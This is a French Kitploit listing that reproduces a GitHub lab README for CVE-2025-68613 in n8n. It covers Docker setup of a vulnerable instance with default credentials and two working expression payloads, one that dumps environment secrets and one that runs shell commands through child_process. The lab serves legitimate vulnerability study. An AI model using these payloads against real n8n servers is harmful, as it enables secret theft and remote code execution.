Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-68613-n8n-lab — Analyse de CVE-2025-68613 | Kitploit
Outils/GitHubGitHub/r4j3sh-com/cve-2025-68613-n8n-lab
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubr4j3sh-com/cve-2025-68613-n8n-lab

CVE-2025-68613-n8n-lab

Analyse de CVE-2025-68613

Voir le dépôt
2il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-68613 Laboratoire local n8n

Ce dépôt fournit une configuration Docker Compose simple qui exécute une instance n8n vulnérable pour le test local de CVE-2025-68613.

Prérequis

  • Docker Desktop ou Docker Engine
  • Docker Compose v2

Démarrage rapide

  1. Démarrer le conteneur :

    root@kitploit:~
    docker compose up -d
    
  2. Ouvrir n8n dans votre navigateur :

    • http://localhost:5678
  3. Se connecter avec les identifiants par défaut définis dans docker-compose.yml :

    • Nom d'utilisateur : admin
    • Mot de passe : password

Arrêt et nettoyage

root@kitploit:~
docker compose down
Télécharger l’outil

Avertissement et sécurité

Cet environnement est destiné uniquement à des tests locaux et isolés. N'exposez pas cette instance sur l'internet public ou sur un réseau non fiable. Gardez-la sur un segment de réseau privé, local uniquement et séparé des systèmes de production. Utilisez-la à vos propres risques.

Vérifier la vulnérabilité (Preuve de concept)

Une fois le conteneur en cours d'exécution, vous pouvez accéder à l'interface n8n à l'adresse http://localhost:5678. Pour tester la vulnérabilité, vous allez injecter une charge utile JavaScript malveillante dans un champ d'expression.

Étapes à reproduire :

  1. Se connecter : Accédez au tableau de bord (si vous avez configuré l'authentification de base, utilisez les identifiants fournis ; sinon, créez un nouveau compte propriétaire).
  2. Créer un workflow : Cliquez sur "Ajouter un workflow" ou accédez à https://n8n.example.com/workflow/new.
  3. Ajouter un nœud : Ajoutez un nœud "Set".
  4. Injecter la charge utile : Dans le champ "Valeur" du nœud Set (assurez-vous d'activer le mode "Expression" s'il est disponible, ou collez simplement la syntaxe que n8n interprète comme une expression), saisissez l'une des charges utiles suivantes :

Test 1 : Exfiltration de variables d'environnement Cette charge utile tente d'accéder aux variables d'environnement du processus, qui contiennent souvent des secrets.

root@kitploit:~
{{ (function() { return this.process.env; })() }}

Exfiltration de variables d'environnement

Test 2 : Exécution de code à distance (RCE) Cette charge utile tente de charger le module child_process pour exécuter des commandes système (par exemple, whoami).

root@kitploit:~
{{ (function() {
    var require = this.process.mainModule.require;
    var execSync = require('child_process').execSync;
    return execSync('whoami').toString();
})() }}

Exemple de RCE pour la commande id

Résultat attendu : Si l'environnement est vulnérable, le panneau "Sortie" du nœud Set affichera le résultat de la commande (par exemple, root ou l'utilisateur n8n) ou un objet JSON contenant les variables d'environnement. Si l'instance était corrigée (par exemple, version 1.122.0+), le sandbox renverrait un objet vide ou une erreur.